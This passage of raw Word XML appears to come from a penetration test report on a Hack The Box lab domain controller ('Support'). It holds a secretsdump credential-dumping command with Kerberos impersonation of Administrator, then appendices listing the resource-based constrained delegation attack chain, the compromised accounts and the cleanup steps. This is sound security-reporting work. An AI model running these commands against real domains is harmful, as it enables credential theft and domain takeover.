      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dc.support.htb</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-impersonate Administrator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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">secretsdump.py -k -no-pass </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dc.support.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -dc-</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10.129.11.223 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -just-dc-user Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D876A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D876B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc233206079"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="081D876C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc233206080"/>
      <w:r>
        <w:t>Appendix A – Finding Severities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="081D876D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Each finding has been assigned a severity rating based on an assessment of the priority with which it should be viewed and its potential impact on the confidentiality, integrity, and availability of Support’s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635C3F" w14:paraId="081D877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6E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="78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6F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity Rating Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D877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6B0AA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D8771" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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72" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation results in complete compromise of confidentiality, integrity, and availability across the domain. Threat exposure is high and exploitation requires minimal privilege or effort.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D877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CBA7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D8774" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="AF601A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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75" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation of the technical or procedural vulnerability will cause substantial harm. Threat exposure is high, thereby increasing the likelihood of occurrence. Security controls are not effectively implemented to reduce the severity of impact if exploited.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D877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9E79F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D8777" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9A7D0A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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78" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation significantly impacts confidentiality, integrity, and/or availability, but impact is contained in scope, or threat exposure is more limited than a High finding would suggest.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D877A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table 4: Severity Definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D877B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc233206081"/>
      <w:r>
        <w:t>Appendix B – Exploited Hosts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360"/>
        <w:gridCol w:w="2800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D878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7C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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7D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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7E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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7F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D878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1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.129.11.223 (DC01)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2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal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3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RBCD → </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>secretsdump</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4" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.129.11.223 (DC01)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7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal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8" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Anonymous SMB / Static Analysis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89" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial credential disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D878B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table 5: Exploitation Attempt Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D878C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc233206082"/>
      <w:r>
        <w:t>Appendix C – Compromised Users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160"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D879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8D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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8E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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8F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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90" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D879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2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ldap</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3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Service Account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4" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Binary </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>decompilation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / XOR decryption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5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LDAP bind access only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D879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7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>support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8" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain User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9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cleartext password in info attribute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A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> access; member of SHARED SUPPORT ACCOUNTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87A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C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Administrator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D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain Admin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E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RBCD → </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>secretsdump</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9F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full domain compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D87A1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table 6: User Accounts Compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D87A2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc233206083"/>
      <w:r>
        <w:t>Appendix D – Changes/Host Cleanup</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635C3F" w14:paraId="081D87A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A3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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A4" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="59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A5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Change/Cleanup Needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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A7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.129.11.223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A8" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal</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A9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Computer account FAKE$ created during RBCD attack — remove from AD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87A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AB" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.129.11.223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AC" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal</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AD" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msDS-AllowedToActOnBehalfOfOtherIdentity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> attribute written on DC$ — reset to default (null)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D87AF" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D87B0" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc233206084"/>
